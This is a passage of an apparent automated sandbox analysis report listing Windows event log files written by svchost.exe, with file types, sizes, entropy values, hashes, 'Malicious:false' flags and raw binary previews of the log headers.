                                                                                                                                                                                                                                              SHA-512:6FA98EF05315A8DCC122232E81EF5A62464E1ADF55AD673C7FEBF683CADC64E475DE3205A5DF46186A188D7BECEB382E8A2AC7049EB67B25DDE0DEC7282F82B3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk......................................+...-....&#......................................................................Z.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................])..............................**................gm............E!................................................................>.......V...X.!..e................gm.......`...a..`....... ........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...!>.])......!>....[.U.....i...........|...:....A..3...b...%....=.......F.i.l.e.N.a.m.e.L.e.n.g.t.h.......A..3...b...%....=.......F.i.l.e.N

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:DIY-Thermocam raw data (Lepton 2.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 207715216474546355539665747968.000000
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):0.8526226240352849
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:YhAiPA5PNPxPEPHPhPEPmPSPRP3PoPqP7DPfPqP/P:Y2NP
                                                                                                                                                                                                                                              MD5:585F5E645713292DF375B49B2BDC28EA
                                                                                                                                                                                                                                              SHA1:42531DC7FEDA50E16705A1260EC70B5AD7015FCB
                                                                                                                                                                                                                                              SHA-256:E16C3A02C9E22074AE98621BB170E12D41A54187FCC6D53B5600F5712F37A9FF
                                                                                                                                                                                                                                              SHA-512:0C0008188EC621D5FE00CF9211729347A941AF2DE55DA3333114D83B4D181FB8792C64FA0F62309660F51FF26349684D35EAC0A4E0FE98898D1C03CAAB65B434
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk......................................%...&...A..................................................................... p..................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):0.8442469423268683
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:DhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lk:DWXSYieD+tvgzmMvB2R387
                                                                                                                                                                                                                                              MD5:A12D2A18D158FA0E4EBA801B76795EAC
                                                                                                                                                                                                                                              SHA1:22C6C36D8E0ACD32735F5C0D25929CD734A2DB9F
                                                                                                                                                                                                                                              SHA-256:4A2A9FFE44AB14DE2504B3632FBDDC8EC4E3B35AFF6C5CCA75AB5095E164E39E
                                                                                                                                                                                                                                              SHA-512:729117B98F2FA8D18DD3A9B0A373EA5CD36A9B88BA54A45579DE0C50C68DABAB50096CC3078DDA1C11A7483D95CD6B39A54AF35282B1C2550F0AAE4A80F8BEA9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk......................................$...&.....i....................................................................x..(................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................&...............................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):106664
                                                                                                                                                                                                                                              Entropy (8bit):3.839330675778791
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:ONhShqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqk:OWbCyhLfI931dWbCyhLfI931dS
                                                                                                                                                                                                                                              MD5:4F1D27F2D8E307F851E32537D0332FC9
                                                                                                                                                                                                                                              SHA1:342B9959D581152295FF17FC1701538BC85296A9
                                                                                                                                                                                                                                              SHA-256:DB1C54697337BA1D3E73E6ADC88C78186619FD2A7AE03DD63DD1F3CCB3975F9D
                                                                                                                                                                                                                                              SHA-512:00FFACFCC7D6AC11775274843427AA8B7A4AF2CC74328AFEF84C51E81260D9989C04FCA16C590B24A6A7C964FA6D03C07E827AFDE138C0C1D3C018EF5826FE8D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........N...............N....................f......................................................................W...................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n.......6t..............................................................................**......N.......k.nk............E!6t..............................................................<.......T.....!.................k.nk.......`...Z..`...x.......N....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I.@.....NF.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I./.O.p.e.r.a.t.i.o.n.a.l....0.............`....0.....J.o0..;..C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.i.c.r.o.s.o.f.t.\.P.r.o.t.e.c.t.\.S.-.1.-.5.-.1.8.\..............

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):66528
                                                                                                                                                                                                                                              Entropy (8bit):3.4133176467502055
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:/4cMhFBuyKskZljdoKXjtT/r18rQXn8uwgSj70FTP1:/tMhFBuV80r
                                                                                                                                                                                                                                              MD5:38E8082F2CC552B66263BEDC525A24C2
                                                                                                                                                                                                                                              SHA1:E533467CEEFE758FAEA3CE8D131EFFFF4DFF692A
                                                                                                                                                                                                                                              SHA-256:AD8DCED9309E2F498D2240DE664A7ECBE05BAE55777554F6A4E8FF1992F61825
                                                                                                                                                                                                                                              SHA-512:B3BAD450CBC08737ABF4A2FFC24CCC00D2B539C26A5D61918C078D2D7B1295E1244F24183EAEEA399D863BF05235C67F46D16BC9585684070648703219B5C8B8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........P...............P...............h...%.......................................................................>.5.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A..........................................**......P.........x............E!................................................................>.......V...y.!...................x....~..-4..A.e3.L...x.......P....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.N.C.r.y.p.t........E..3...pM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.N.C.r.y.p.t./.O.p.e.r.a.t.i.o.n.a.l....M.........F...........M.i.c.r.o.s.o.f.t. .P.l.a.t.f.o.r.m. .C.r.y.p.t.o. .P.r.o.v.i.d.e.r...0...l.s.a.s.s...e.x.e................ElfChnk.

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):4.900320443969457
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:/tvigwV4kvAzBCBao/F6Cf2SEqEhwaK41HZalMIq9Iz6IOTLGfFXN/E:FzH+dqWzrhFXN/E
                                                                                                                                                                                                                                              MD5:628E6FD6542F9330AA4922256F7F8CA3
                                                                                                                                                                                                                                              SHA1:16DF4B2D6201E9E8A8CBFDB64CADE2C5E91C6491
                                                                                                                                                                                                                                              SHA-256:B63F81272D5118AD62FAE5E4A2BAC1F9982EE927C93C7D90811B748D5C87781A
                                                                                                                                                                                                                                              SHA-512:CC023AEA9F4BB02B8BCC5C6DC3C2ABDEEEA487AD47475A1B5C13F854BB4B50E6001AEB07A10D8035CF8DBA0FD848F91B4DB4F82F2462A0E9559D033F80C87C09
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.w...............w............................Q.1....................................................................YW3.................4.......................\...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..H...w...........`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 27, DIRTY
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):93416
                                                                                                                                                                                                                                              Entropy (8bit):2.772302898242841
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:2rh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkz3:oMAP1Qa5AgfQQhCUMAP1Qa5AgfQQhC
                                                                                                                                                                                                                                              MD5:2CB054BF7C8FC97367BFA78469ABAB31
                                                                                                                                                                                                                                              SHA1:312FEA2127B96A9077BB3D864C00550F045F69A9
                                                                                                                                                                                                                                              SHA-256:0B20CD6B6BF6095B4BD064A9364A45AE90F1511103B09F13DEE7B05C8E2A342B
                                                                                                                                                                                                                                              SHA-512:8B7DDAA8C21FC9AB7F55E5FBD42E101271059A68BBAA026A6B649E0C9C080D1701518D2F301B631C20DEA1108F8421211D74A685CA62E2AD5A1DE21B3CB921E8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfFile.....................................................................................................................|.~2ElfChnk.....................................hi..hl...M.......................................................................KQ................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........Y...............................&..............;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):4.441475404183629
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:ZbM5eahvB94LSAoiMTQMrj+/IVvu4mJY0YCOO:dMAaZBLzn6fYZO
                                                                                                                                                                                                                                              MD5:B7F318BB9FA336235CCBE5A391775D8E
                                                                                                                                                                                                                                              SHA1:F7F7CFF57A6BB00B4E6F17E39BAAF2443E08878D
                                                                                                                                                                                                                                              SHA-256:D59515423F15D3618746447E1333945BF1432B9B4C20B54849050CE17C72311D
                                                                                                                                                                                                                                              SHA-512:1C8FA8FD31BC4A3C6815A473C00187497E7E71CAF1FAD61F5A6D73DBEB6AE9D551A3DAA6B39B76A4D1401A061844036D5D06469A3942BC030B276D4E186C7289
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.r...............r...................0.......A..@....................................................................k...................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F....................+...............)......55......................&.......E....@......M#..............u7.......1.........../...........!..]>......**......r.......R...`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:DIY-Thermocam raw data (Lepton 3.x), scale 8448-4108, spot sensor temperature 0.000000, unit celsius, color scheme 1, show spot sensor, calibration: offset 0.000000, slope 308596736.000000
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):3.4699263306571524
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:6hYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Klq:61T4hu7OJscMmza
                                                                                                                                                                                                                                              MD5:86173450A7EE15BC5B6A2C667DD3B040
                                                                                                                                                                                                                                              SHA1:200635B7FB3137AB9A33A6551182F4BA05BDCE84
                                                                                                                                                                                                                                              SHA-256:AEDE5AAE515D2A3C78BA23C631D178DCCB3E775CD3B4FB6F0406887FAEDE5B88
                                                                                                                                                                                                                                              SHA-512:3A73438F1A7B3B2F166B2B2F70E713F7393A2F2D5DF23858D05F2790BD2DF5B2CDC38263EC72ECC34621C82C44308E3C0474E295C678642E30146CAC27D69067
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........s...............s..............x....,........................................................................5.................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):2.450965793914843
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:phFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDfO:pzSKEqsMuy6CL3
                                                                                                                                                                                                                                              MD5:3914FD52494E203A25B69F9F4221031F
                                                                                                                                                                                                                                              SHA1:8046E0D1C78A47632A4550AC66FC9917E6429457
                                                                                                                                                                                                                                              SHA-256:D2D37391EC1325C6C27486311C5B5E1D11C55D0A464270F009E3D3E1B2A54D3B
                                                                                                                                                                                                                                              SHA-512:12FB89D2F9A5B19C7150D23A09A7C7B3F5616C09C8A83AE83A331263F0FA45181066F1A44080A46FE3A9F551BDF56485BD03DB9001FE82388DCDB1EF3FBC7829
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........L...............L...................=....................................................................... ..H................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&........................................`..............................................................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):2.1568075545974956
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:ZhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zg:Zmw9g3LCjg
                                                                                                                                                                                                                                              MD5:F3CF496665845DA6C957242770973ECE
                                                                                                                                                                                                                                              SHA1:BF7206ECD6C6ABE687BE10A157C86C7EBE59C6BD
                                                                                                                                                                                                                                              SHA-256:BB190FF3FA391F3B69F3E4509B14D6DE320C980D69A59BC74DBD57BD8AA42F7F
                                                                                                                                                                                                                                              SHA-512:EA5A2D21353556B5B6FC420671E5F7026B6A280C7CD740CD1CAFA2C958318B5BB6A5F4AE6A00450E2A7997425A0AAAFFD158452401ABB732CA985A8DE3548213
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........6...............6...........(o...p..........................................................................y.................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n........X..............................................................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):1.8853799397148268
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:5hCI2LwuSsYI8tIbLIYoI/IE6IQsIhIxIUIfIXIAI2I/IRIvI:5Z
                                                                                                                                                                                                                                              MD5:FACBCFA717058EFCED1754221D6A421D
                                                                                                                                                                                                                                              SHA1:1BA10B3E2BB8A2C739257CE228789E2D6C4F1A1D
                                                                                                                                                                                                                                              SHA-256:6F6A7779828D79A41F94AF9EE452BB44EE0E495D27A5B5DE7DAD659A6865C9CB
                                                                                                                                                                                                                                              SHA-512:0253FDCC88D3E52A9A26A065AC0C4E264DC0E84CB6A175D09BEC79E56D5282B9B95DCE2FEF47C48505D34C629388904AA6E2BDFF81759920FE314D6F9F5A6DB0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.K.......L.......K.......L...............@6..u..B.....................................................................w..................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**......K.......1E..`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:MS Windows Vista Event Log, 14 chunks (no. 13 in use), next record no. 372, DIRTY
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):62624
                                                                                                                                                                                                                                              Entropy (8bit):5.680704859148489
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:N2ehna5gzuzNz0zxzuewKWMK/a5kWcra5Ae0a5c9IzIzyzkma5Opa5GPia5L9Xzr:MeHcW+EzJxFNPrMFZEoGJC3Ep9d
                                                                                                                                                                                                                                              MD5:4BAB79FF67BBE6303D9A7F4FEDFBD297
                                                                                                                                                                                                                                              SHA1:3E9498B5730704BE01D9AB24BE63ED3D978345D5
                                                                                                                                                                                                                                              SHA-256:261C77C86D2B54606F7B0CC9F4147D3A3D7CB3540E2C67444297DEB7373E2687
                                                                                                                                                                                                                                              SHA-512:507A6F72DC4563C613841C14ED4B91CE15EC4521109DFE51CE6E76A811BF7DFC44B0DB264BE21CE75204BDF79B4EDB17D69B0EFB8E9FC49086208EC47218686B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfFile.................t...................................................................................................S{f.ElfChnk.r.......y.......r.......y............8..x>...Q.6....................................................................m...........................................@...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&................................-..............................................**......r..........`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):1.0596696487276978
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:Qh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMpHMXmM+ZM6Zz:QeJ+
                                                                                                                                                                                                                                              MD5:F6D375E51341AC949A73803CF00B96E6
                                                                                                                                                                                                                                              SHA1:5DB3BF9A34145DD777EA9593DE3C8054B08A11D1
                                                                                                                                                                                                                                              SHA-256:EBDFA834049A08F8FC9B3DD35800233E75BDB480D59E548D7F4F3F2720B889F9
                                                                                                                                                                                                                                              SHA-512:1714A4243ECEB63E23583F31D3D6C161D8423E1AD2D1E1440545718E6DA879F74C2F03E5C21120ED826093777F6DEEEFEC57B913E1B4C1D74C0B8A473752460B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........................................X0.....!....................................................................B...........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................6(..............................................................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):4.241268628600426
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:Thk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1/:TBjdjP0csQqL
                                                                                                                                                                                                                                              MD5:602FD635C1BE2C0F087784BAE052554B
                                                                                                                                                                                                                                              SHA1:77EE62511C78BA6989DF77AC6B616422A44D7F54
                                                                                                                                                                                                                                              SHA-256:78FC5D1D71915650A8080B217B8B28F799B054F35C89AAB2C474DC4B9C3F0581
                                                                                                                                                                                                                                              SHA-512:8A66621CE4233D42AE83A0046A04628F4A88D91713C064944A61AFDF3F33D44E54E416A8441D1FFFDDCEA2E909761BBF151894881B4F93C0D238537939E21217
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk...............................................j.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&..............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):128208
                                                                                                                                                                                                                                              Entropy (8bit):3.6957707566714455
                                                                                                                                                                                                                                              Encrypted:false
